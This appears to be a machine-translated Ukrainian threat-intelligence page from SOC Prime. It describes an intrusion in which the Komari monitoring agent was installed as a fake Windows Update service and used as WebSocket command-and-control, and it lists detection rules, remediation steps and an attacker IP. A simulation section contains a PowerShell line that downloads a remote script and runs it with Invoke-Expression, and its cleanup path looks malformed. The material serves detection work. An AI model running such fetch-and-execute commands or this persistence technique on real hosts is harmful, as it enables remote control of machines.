SOC Prime Bias: Критичний

30 Apr 2026 14:19 UTC

Komari: Інструмент «Моніторингу», Який Не Потребував Оружі

Author Photo
SOC Prime Team linkedin icon Стежити
Komari: Інструмент «Моніторингу», Який Не Потребував Оружі
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Резюме

Зловмисник використав вкрадені облікові дані VPN, щоб отримати доступ до робочої станції Windows партнера Huntress, потім увімкнув RDP і розгорнув агент моніторингу з відкритим кодом Komari як сервіс рівня SYSTEM, замаскований під службу оновлення Windows за допомогою NSSM. Після установки агент встановив стале з’єднання WebSocket із інфраструктурою, контрольованою зловмисником, і надав функції, такі як виконання команд, доступ до терміналу та відстежуючі пінги. На практиці інструмент функціонував як легковажна платформа управління і контролю без потреби в додатковій зброї.

Розслідування

Проникнення почалося з входу в SSL VPN, що походив з 45.153.34.132, а потім з використанням Impacket’s smbexec.py для ввімкнення RDP і виконання низки віддалених команд. Розслідувачі виявили, що одноразова команда PowerShell завантажила інсталятор Komari безпосередньо з GitHub і зареєструвала його як службу Windows. Ця служба потім запустила komari-agent.exe, відкрило сесію WebSocket до сервера зловмисника і дало змогу виконувати довільні віддалені команди на хості.

Усунення

Huntress відреагував, ізолювавши скомпрометовану робочу станцію, відключивши обліковий запис користувача та зупинивши службу Komari, створену NSSM. Шкідливе з’єднання WebSocket було заблоковано, а механізм збереження вилучено із системи. Рекомендовані подальші заходи включають посилення контролю доступу VPN, моніторинг підозрілих подій створення служб, перевірку вихідної активності WebSocket і посилення безпеки RDP.

Реакція

Захисники повинні виявляти створення служби Windows з назвою Windows Update Service, яка вказує на komari-agent.exe, моніторити довгострокові вихідні з’єднання WebSocket із незнайомими хостами та повідомляти про використання інструментів Impacket, таких як smbexec.py для латерального руху. Якщо виявлено, необхідно негайно вмістити уражений кінцевий пункт, відкликати скомпрометовані облікові дані та видалити помилкову службу з середовища.

Потік атаки

Виявлення

Можливі зразки командного рядка Impacket (через cmdline)

Команда SOC Prime
30 квітня 2026

Можливе дистанційне виконання коду за допомогою Impacket (через cmdline)

Команда SOC Prime
30 квітня 2026

Виконання файлу PowerShell у підозрілому каталозі з використанням політики обходу (через cmdline)

Команда SOC Prime
30 квітня 2026

Завантаження або вивантаження через PowerShell (через cmdline)

Команда SOC Prime
30 квітня 2026

Можливе затінення служб віддаленого робочого столу (через процес створення)

Команда SOC Prime
30 квітня 2026

Підозрілі зміни брандмауера через CLI (через cmdline)

Команда SOC Prime
30 квітня 2026

Підозрілий процес використовує URL у командному рядку (через cmdline)

Команда SOC Prime
30 квітня 2026

Альтернативне віддалене управління/програмне забезпечення управління (через процес створення)

Команда SOC Prime
30 квітня 2026

IOCs (HashSha256) для виявлення: Komari: “Інструмент моніторингу”, що не потребував зброї

Правила SOC Prime AI
30 квітня 2026

IOCs (SourceIP) для виявлення: Komari: “Інструмент моніторингу”, що не потребував зброї

Правила SOC Prime AI
30 квітня 2026

IOCs (DestinationIP) для виявлення: Komari: “Інструмент моніторингу”, що не потребував зброї

Правила SOC Prime AI
30 квітня 2026

Виявлення виконання Impacket smbexec.py і cmd.exe через RDP [створення процесів Windows]

Правила SOC Prime AI
30 квітня 2026

Виконання PowerShell для встановлення агента Komari [Windows PowerShell]

Правила SOC Prime AI
30 квітня 2026

Виявлення стабільності агента Komari через службу Windows Update [Система Windows]

Правила SOC Prime AI
30 квітня 2026

Виявлення неавторизованого доступу SSLVPN та активності після компрометації [Брандмауер]

Правила SOC Prime AI
30 квітня 2026

Виконання моделювання

Передумова: перевірка телеметрії та базових показників повинна бути успішно пройдена.

  • Опис атаки та команди:
    Противник отримав початкову точку доступу на Windows хості та хоче встановити агент Komari C2 для підтримки стабільності й пізніше витягти облікові дані (T1003.001). Щоб уникнути спрацьовування традиційних засобів блокування скриптів, він запускає PowerShell з -ExecutionPolicy Bypass і безпосередньо завантажує інсталятор з публічного репозиторію GitHub. Командний рядок точно відповідає правилу виявлення, генеруючи очікувану телеметрію.

  • Тестовий скрипт регресії:

    # Імітація встановлення агента Komari
    $url = "https://raw.githubusercontent.com/komari-monitor/komari-agent/main/install.ps1"
    $script = (New-Object System.Net.WebClient).DownloadString($url)
    Invoke-Expression $script
  • Команди очищення:

    # Видалення будь-яких файлів, створених симульованим інсталятором (якщо такі є)
    Remove-Item -Path "$Env:ProgramFilesKomari" -Recurse -Force -ErrorAction SilentlyContinue
    # Зупинення будь-якого процесу Komari, який міг бути запущений
    Get-Process -Name "Komari" -ErrorAction SilentlyContinue | Stop-Process -Force